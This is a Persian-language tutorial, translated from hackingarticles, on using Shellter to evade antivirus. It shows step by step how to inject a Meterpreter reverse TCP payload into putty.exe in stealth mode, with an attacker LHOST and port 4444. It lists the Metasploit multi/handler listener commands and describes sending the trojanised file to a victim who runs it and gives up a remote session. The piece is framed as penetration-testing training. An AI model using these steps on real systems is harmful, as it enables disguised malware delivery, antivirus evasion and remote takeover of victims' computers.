دور زدن آنتی ویروس با Shellter

در این مقاله قصد داریم تا شما را با نحوه دور زدن آنتی ویروس با Shellter آشنا کنیم ابزار Shellter ابزاری است که با استفاده از آن می توان یک Payload را ایجاد کرده و سپس با استفاده از روش هایی که در Shellter وجود دارد می توان آنتی ویروس را بای پس کرد.

Shellter چیست؟

Shellter یک ابزار داینامیک درج یا الحاق Shellcode و ابزار هک آنتی ویروس است؛ که به‌طور مؤثر یک shellcode را مجدداً encode می‌کند تا نرم‌افزار آنتی‌ویروس (AV) را دور بزند. Shellter ثابت کرده  که اولین آلوده‌کننده داینامیک برای فرمت فایل PE یا (Portable Executable) برنامه‌های  ۳۲ بیتی ویندوز است ما از ابزار shellter برای هک آنتی ویروس استفاده می‌کنیم.

برای استفاده از هک آنتی ویروس Shellter می‌توانید shellcode خود را ا با استفاده از  Metasploit ایجاد کنید. Shellter یک برنامه  ۳۲ بیتی ویندوزی و shellcode را به‌گونه‌ای تعبیه می‌کند که توسط نرم‌افزار AV شناسایی نمی‌شود.

نصب ابزار Shellter

نحوه نصب آن در کالی به‌صورت زیر است.

نرم‌افزار wine32 را هم به شکل زیر دانلود و نصب کنید.

شروع کار با ابزار هک آنتی ویروس  Shellter

بعد از باز کردن Shellter با استفاده ازwine  از شما می‌خواهد حالت موردنظر را انتخاب کنید.

گزینه “a” را انتخاب کنید.

حالا باید یک فایل اجرایی را انتخاب کرده و در پوشه Shellter کپی کنید. این کار برای اتصال Shellter با یک فایل exe ضروری است. در اینجا ما فایل putty.exe را در پوشه Shellter کپی کرده و آن را به فایل نرم‌افزار Shellter پیوند می‌دهیم. زمانی که از PE Target خواسته شد، دستور زیر را تایپ کنید:

عملیات bind کردن شروع می‌شود.

برای ادامه کلید Enter را فشار دهید. ممکن است ببینید فایل DisASM.dll با موفقیت ایجاد شده است. حالت مخفی کردن را فعال کنید. سپس، از شما خواسته می‌شود که حالت مخفی‌کاری را فعال کنید، “y” را برای تائید وارد کنید.

صفحه فهرستی از payloadها را نشان می‌دهد. از شما می‌پرسد که آیا می‌خواهید از payloadهای فهرست شده استفاده کنید یا سفارشی. برای استفاده از payloadهای فهرست شده، “L” را تایپ کنید. سپس، از شما می‌خواهد که شماره payload موردنظر را از فهرست انتخاب کنید. شما می‌توانید شماره موردنظر خود را انتخاب کنید. در این مورد  ما ۱ را برای Meterpreter_Reverse_TCP انتخاب کرده‌ایم.

سپس از شما خواسته می‌شود که LHOST و LPORT را تنظیم کنید. لوکال هاست و لوکال پورتی را که می‌خواهید session را روی آن انجام دهید وارد کنید. در این مورد ما، LHOST 192.168.1.109 [Attacker IP] و LPORT را به‌عنوان ۴۴۴۴ تنظیم کرده‌ایم. وقتی کلید Enter را فشار دهید، اطلاعات payload نمایش داده می‌شود.

یک پیام هشدار ظاهر می‌شود و به‌محض اینکه injection تأیید شد، از شما خواسته می‌شود برای ادامه، کلید Enter را فشار دهید.

اجرا کردن Listenser در Msfconsole

در یک ترمینال جدید msfconsole را تایپ کنید تا  Metasploit framework راه‌اندازی شود و دستور زیر را اجرا کنید که یک listener است

• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• <set lhost <IP
• <set lport <port-no
• exploit

فایل putty.exe را به سمت سیستم تارگت ارسال می‌کنیم. وقتی قربانی روی فایل putty.exe کلیک می‌کند که shellcode به آن bind شده قربانی به دام افتاده و ما یک meterpreter دریافت می‌کنیم.

meterpreter session باز می‌شود و دسترسی سیستم قربانی در اختیار ما قرار می‌گیرد.

این مقاله از منبع hackingarticles ترجمه‌شده است.

امیدوارم از مقاله‌ی هک آنتی ویروس استفاده لازم را برده باشید. درصورتی‌که علاقه‌مند به مباحث تست نفوذ شبکه  هستید می‌توانید در دوره های  آکادمی تک وان ۲۴ شرکت کنید.